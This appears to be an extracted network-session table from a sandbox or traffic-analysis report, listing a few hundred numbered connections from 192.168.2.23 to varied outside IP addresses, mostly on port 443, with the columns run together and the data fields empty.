                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15312192.168.2.2337804128.147.16.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15313192.168.2.235398238.72.35.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15314192.168.2.2351438132.129.102.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15315192.168.2.233285271.129.45.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15316192.168.2.2348918164.147.4.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15317192.168.2.2340426152.162.27.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15318192.168.2.2345530193.171.18.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15319192.168.2.2358444138.102.151.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15320192.168.2.235587057.64.230.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15321192.168.2.2346116147.239.59.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15322192.168.2.235001436.99.64.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15323192.168.2.2340732114.83.164.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15324192.168.2.2343062132.238.90.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15325192.168.2.234290413.16.206.80443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15326192.168.2.235556023.233.236.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15327192.168.2.2348646213.247.216.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15328192.168.2.235257832.214.3.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15329192.168.2.2333936170.88.141.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15330192.168.2.233499024.177.197.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15331192.168.2.2360532170.7.178.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15332192.168.2.235997683.87.250.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15333192.168.2.2347492113.27.30.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15334192.168.2.2346890128.95.24.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15335192.168.2.235570274.130.2.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15336192.168.2.234888478.195.60.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15337192.168.2.235547264.22.196.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15338192.168.2.2351858164.16.102.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15339192.168.2.2335476199.153.182.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15340192.168.2.2346156216.217.95.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15341192.168.2.23576122.172.113.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15342192.168.2.2339736205.33.37.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15343192.168.2.234267660.225.4.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15344192.168.2.2344722159.189.37.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15345192.168.2.234046892.25.33.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15346192.168.2.2341280208.117.40.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15347192.168.2.233689246.97.28.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15348192.168.2.2344280222.51.207.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15349192.168.2.2333302120.247.6.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15350192.168.2.2352904124.9.241.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15351192.168.2.2335010113.9.158.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15352192.168.2.2351316196.111.158.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15353192.168.2.23557484.190.178.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15354192.168.2.2349576125.50.187.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15355192.168.2.235247624.174.198.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15356192.168.2.2334556195.123.109.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15357192.168.2.235780218.106.46.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15358192.168.2.234364627.201.81.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15359192.168.2.234265043.100.152.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15360192.168.2.2352254172.87.180.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15361192.168.2.2346808178.198.17.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15362192.168.2.233346079.214.172.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15363192.168.2.234302237.230.179.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15364192.168.2.2343426160.31.69.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15365192.168.2.234994444.8.255.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15366192.168.2.2359396144.176.251.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15367192.168.2.2358760195.108.36.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15368192.168.2.234607298.3.214.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15369192.168.2.2355432219.193.233.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15370192.168.2.2353916205.231.188.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15371192.168.2.2344730185.157.221.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15372192.168.2.236071254.155.201.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15373192.168.2.2352566176.110.8.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15374192.168.2.235175052.5.132.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15375192.168.2.2338430189.246.129.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15376192.168.2.233857299.18.91.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15377192.168.2.235722459.118.180.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15378192.168.2.235959641.48.12.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15379192.168.2.2333042133.192.135.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15380192.168.2.2339804189.11.244.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15381192.168.2.2340298195.93.157.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15382192.168.2.2357614184.32.83.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15383192.168.2.2351232143.11.83.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15384192.168.2.2342576105.203.111.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15385192.168.2.2349404155.67.153.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15386192.168.2.2337108138.217.192.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15387192.168.2.2335544167.156.244.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15388192.168.2.2349052117.161.119.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15389192.168.2.235434819.83.50.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15390192.168.2.233692036.232.131.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15391192.168.2.2360790142.210.122.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15392192.168.2.235636837.137.72.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15393192.168.2.2334452106.92.87.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15394192.168.2.233374261.143.84.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15395192.168.2.233438214.139.191.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15396192.168.2.2356124161.86.28.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15397192.168.2.233579077.21.153.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15398192.168.2.233383092.17.255.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15399192.168.2.2340178200.139.34.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15400192.168.2.2340148177.55.94.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15401192.168.2.2334698213.237.6.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15402192.168.2.233628857.174.70.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15403192.168.2.233848866.191.231.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15404192.168.2.2355112151.30.228.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15405192.168.2.2359026202.151.218.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15406192.168.2.2356640138.92.17.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15407192.168.2.2352682105.107.70.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15408192.168.2.2356504170.39.96.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15409192.168.2.23465309.7.41.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15410192.168.2.235975878.156.83.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15411192.168.2.2334930217.219.185.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15412192.168.2.2345264123.90.156.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15413192.168.2.2343644211.165.223.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15414192.168.2.2335194129.75.115.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15415192.168.2.2340062174.149.202.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15416192.168.2.234580883.165.77.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15417192.168.2.2346680191.190.119.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15418192.168.2.2360786156.187.145.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15419192.168.2.2351186178.8.196.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15420192.168.2.2350498169.133.92.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15421192.168.2.23553722.48.248.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15422192.168.2.2354590150.147.207.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15423192.168.2.234524086.186.141.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15424192.168.2.235685667.71.96.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15425192.168.2.2342574186.106.86.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15426192.168.2.2339452114.164.149.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15427192.168.2.235095266.178.199.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15428192.168.2.2356874218.230.80.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15429192.168.2.233886850.67.225.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15430192.168.2.235927053.172.231.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15431192.168.2.2346908146.235.231.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15432192.168.2.2352554146.28.179.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15433192.168.2.234446292.232.10.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15434192.168.2.235167279.218.115.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15435192.168.2.233580637.111.65.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15436192.168.2.2340806174.46.41.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15437192.168.2.2359472199.12.56.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15438192.168.2.235540840.81.110.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15439192.168.2.235685239.99.224.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15440192.168.2.2336192168.213.46.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15441192.168.2.235373440.199.99.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15442192.168.2.2343020126.250.214.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15443192.168.2.2351030201.171.194.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15444192.168.2.2346608176.121.179.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15445192.168.2.2338048119.160.133.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15446192.168.2.2334338168.209.71.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15447192.168.2.2358650110.162.68.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15448192.168.2.235599818.106.130.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15449192.168.2.2342088140.181.106.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15450192.168.2.2343082159.58.45.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15451192.168.2.235629089.183.89.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15452192.168.2.234731470.46.58.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15453192.168.2.2354474187.86.218.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15454192.168.2.235263289.188.53.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15455192.168.2.2345252148.144.64.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15456192.168.2.2352914134.32.27.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15457192.168.2.235733462.236.29.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15458192.168.2.235978897.221.227.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15459192.168.2.2350578135.20.245.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15460192.168.2.235345025.243.73.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15461192.168.2.2355504186.162.203.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15462192.168.2.234593214.44.116.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15463192.168.2.2338894198.209.219.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15464192.168.2.2334674187.90.220.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15465192.168.2.233734272.130.220.167443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15466192.168.2.23487041.208.44.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15467192.168.2.235867420.54.252.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15468192.168.2.2347716116.91.116.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15469192.168.2.2344950157.55.227.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15470192.168.2.2343972121.166.250.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15471192.168.2.234417032.161.231.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15472192.168.2.233807286.71.65.208080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15473192.168.2.236071237.186.211.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15474192.168.2.2358252156.10.150.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15475192.168.2.236086053.50.182.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15476192.168.2.2346822143.27.210.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15477192.168.2.2351126148.177.166.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15478192.168.2.23514584.38.68.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15479192.168.2.2341528101.173.23.70443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15480192.168.2.23594162.128.3.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15481192.168.2.2346268197.58.162.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15482192.168.2.234730091.179.68.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15483192.168.2.2349778101.151.106.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15484192.168.2.2352442142.36.69.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15485192.168.2.2345148146.41.57.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15486192.168.2.2351322223.10.27.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15487192.168.2.2351204124.125.2.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15488192.168.2.2344164213.222.235.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15489192.168.2.2359102167.29.126.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15490192.168.2.233892853.159.179.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15491192.168.2.2336740201.14.74.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15492192.168.2.235012013.77.123.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15493192.168.2.234785061.116.156.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15494192.168.2.234551848.130.220.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15495192.168.2.2339580134.60.166.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15496192.168.2.2340896200.32.255.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15497192.168.2.235394642.102.155.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15498192.168.2.236039823.167.253.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15499192.168.2.2339118101.41.120.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15500192.168.2.233559684.15.26.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15501192.168.2.235907641.218.24.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15502192.168.2.2335840123.169.10.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15503192.168.2.234654696.89.150.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15504192.168.2.2333884117.252.110.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15505192.168.2.2342096220.131.87.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15506192.168.2.2356806217.23.171.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15507192.168.2.2341258100.238.148.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15508192.168.2.2335810163.98.160.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15509192.168.2.233838638.227.200.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15510192.168.2.234817239.218.22.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15511192.168.2.2352994182.171.49.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15512192.168.2.235242670.157.155.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15513192.168.2.2335548118.243.227.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15514192.168.2.2339034149.97.196.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15515192.168.2.234413272.118.201.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15516192.168.2.2356534179.219.51.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15517192.168.2.2357420137.40.232.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15518192.168.2.2348052180.129.66.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15519192.168.2.2341156220.92.56.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15520192.168.2.2338774181.101.202.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15521192.168.2.2344408167.93.152.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15522192.168.2.2359126124.125.6.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15523192.168.2.233464668.23.221.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15524192.168.2.2355492148.88.187.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15525192.168.2.234746243.79.75.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15526192.168.2.23548725.185.9.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15527192.168.2.235305637.153.104.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15528192.168.2.2341104132.164.250.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15529192.168.2.2358030157.37.96.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15530192.168.2.2350882132.123.27.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15531192.168.2.234281838.247.185.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15532192.168.2.234516054.166.95.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
